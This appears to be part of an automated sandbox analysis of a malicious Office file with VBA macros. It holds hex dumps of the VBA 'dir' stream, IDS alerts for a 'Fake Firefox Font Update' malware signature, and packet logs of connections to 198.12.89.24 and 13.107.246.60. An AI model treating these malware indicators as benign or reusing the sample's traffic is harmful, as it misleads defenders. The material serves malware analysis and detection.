                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                CLSID:
                File Type:data
                Stream Size:553
                Entropy:6.375463798458224
                Base64 Encoded:True
                Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . U . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 55 1b ea 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2025-03-15T09:08:23.188920+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973213.107.246.60443TCP
                2025-03-15T09:08:29.737992+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973513.107.246.60443TCP
                2025-03-15T09:08:29.783652+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973413.107.246.60443TCP
                TimestampSource PortDest PortSource IPDest IP
                Mar 15, 2025 09:08:07.329216957 CET4972980192.168.2.4198.12.89.24
                Mar 15, 2025 09:08:07.333942890 CET8049729198.12.89.24192.168.2.4
                Mar 15, 2025 09:08:07.336731911 CET4972980192.168.2.4198.12.89.24
                Mar 15, 2025 09:08:07.336937904 CET4972980192.168.2.4198.12.89.24
                Mar 15, 2025 09:08:07.341701984 CET8049729198.12.89.24192.168.2.4
                Mar 15, 2025 09:08:07.804723024 CET8049729198.12.89.24192.168.2.4
                Mar 15, 2025 09:08:07.804847956 CET4972980192.168.2.4198.12.89.24
                Mar 15, 2025 09:08:12.814197063 CET8049729198.12.89.24192.168.2.4
                Mar 15, 2025 09:08:12.814270020 CET4972980192.168.2.4198.12.89.24
                Mar 15, 2025 09:08:22.492908955 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:22.492948055 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:22.493066072 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:22.493459940 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:22.493473053 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.188730955 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.188920021 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.190766096 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.190788984 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.191076994 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.193684101 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.236331940 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.290680885 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.290704966 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.290719032 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.290788889 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.290790081 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.290808916 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.290869951 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.376214981 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.376241922 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.376302958 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.376326084 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.376339912 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.376507044 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.377666950 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.377682924 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.377743006 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.377767086 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.377787113 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.377928019 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.462610960 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.462630033 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.462713003 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.462747097 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.462789059 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.463499069 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.463515997 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.463593960 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.463608027 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.463754892 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.464270115 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.464287043 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.464334011 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.464349985 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.464574099 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.464963913 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.464977980 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.465034962 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.465049028 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.465066910 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.465140104 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.549566031 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.549592972 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.549640894 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.549664021 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.549674988 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.549706936 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.550164938 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.550185919 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.550246954 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.550256014 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.550457954 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.550484896 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.550514936 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.550522089 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.550550938 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.550570965 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.550647974 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.550668955 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.550717115 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.550717115 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.550724030 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.551012039 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.551156044 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.551170111 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.551217079 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.551223040 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.551395893 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.551642895 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.551657915 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.551698923 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.551704884 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.551745892 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.551745892 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.552126884 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.552139997 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.552185059 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.552191973 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.552247047 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.552325010 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.636805058 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.636840105 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.636871099 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.636900902 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.636914968 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.636933088 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.636951923 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.636969090 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.636975050 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.636996031 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.637017965 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.637042999 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.637212038 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.637227058 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.637269020 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.637275934 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.637293100 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.637298107 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.637320042 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.637365103 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.637365103 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.637372017 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.637439966 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.637551069 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.637566090 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.637605906 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.637612104 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.637638092 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.637881994 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.637887001 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.637892962 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.637928963 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.637969017 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.637978077 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.638029099 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.638283014 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.638299942 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.638350964 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.638359070 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.638370037 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.638569117 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.638609886 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.638624907 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.638689995 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.638695002 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.638756990 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.723598003 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.723629951 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.723681927 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.723705053 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.723717928 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.723731995 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.723742008 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.723752975 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.723761082 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.723781109 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.723819017 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.724354029 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.724376917 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.724432945 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.724438906 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.724498987 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.724519014 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.724549055 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.724555016 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.724576950 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.724596024 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.724683046 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.724699020 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.724730968 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.724736929 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.724750042 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.724883080 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.725183010 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.725207090 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.725236893 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.725241899 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.725265026 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.725277901 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.725347996 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.725364923 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.725394964 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.725399971 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.725434065 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.725447893 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.725465059 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.725481033 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.725512028 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.725517988 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.725542068 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.725554943 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.810082912 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.810117960 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.810175896 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.810193062 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.810211897 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.810220957 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.810333014 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.810348988 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.810394049 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.810400963 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.810513973 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.810606003 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.810621977 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.810669899 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.810676098 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.810759068 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.810869932 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.810884953 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.810933113 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.810939074 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.811021090 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.811398029 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.811415911 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.811460018 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.811465979 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.811517954 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.811531067 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.811547041 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.811597109 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.811602116 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.811678886 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.811948061 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.811964035 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.812016010 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.812021017 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.812105894 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.812443018 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.812464952 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.812505007 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.812510014 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.812549114 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.896935940 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.896961927 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.897002935 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.897013903 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.897030115 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.897044897 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.897389889 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.897404909 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.897454977 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.897460938 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.897485018 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.897495031 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.897547007 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.897562027 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.897598982 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.897604942 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.897624016 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.897640944 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.898333073 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.898346901 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.898411036 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.898416996 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.898490906 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.898509026 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.898544073 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.898550034 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.898569107 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.898574114 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.898583889 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.898590088 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.898612022 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.898616076 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.898637056 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.898641109 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.898664951 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.898691893 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.899055958 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.899070978 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.899118900 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.899125099 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.899164915 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.899184942 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.899219036 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.899225950 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.899251938 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.899262905 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.984075069 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.984097004 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.984139919 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.984148026 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.984174967 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.984224081 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.984344959 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.984359980 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.984397888 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.984405994 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.984469891 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.984491110 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.984524012 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.984530926 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.984540939 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.984566927 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.984883070 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.984903097 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.984961033 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.984966993 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.985002995 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.985025883 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.985246897 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.985268116 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.985301018 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.985306025 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.985337019 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.985409975 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.985456944 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.985472918 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.985516071 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.985522032 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.985538960 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.985558033 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.985939980 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.985955000 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.986011982 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.986017942 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.986042023 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.986068964 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.986155987 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.986172915 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.986205101 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.986211061 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:23.986222029 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:23.986247063 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.071007967 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.071026087 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.071084976 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.071099997 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.071147919 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.071240902 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.071255922 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.071295023 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.071302891 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.071348906 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.071419001 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.071436882 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.071475029 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.071480036 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.071736097 CET49732443192.168.2.413.107.246.60
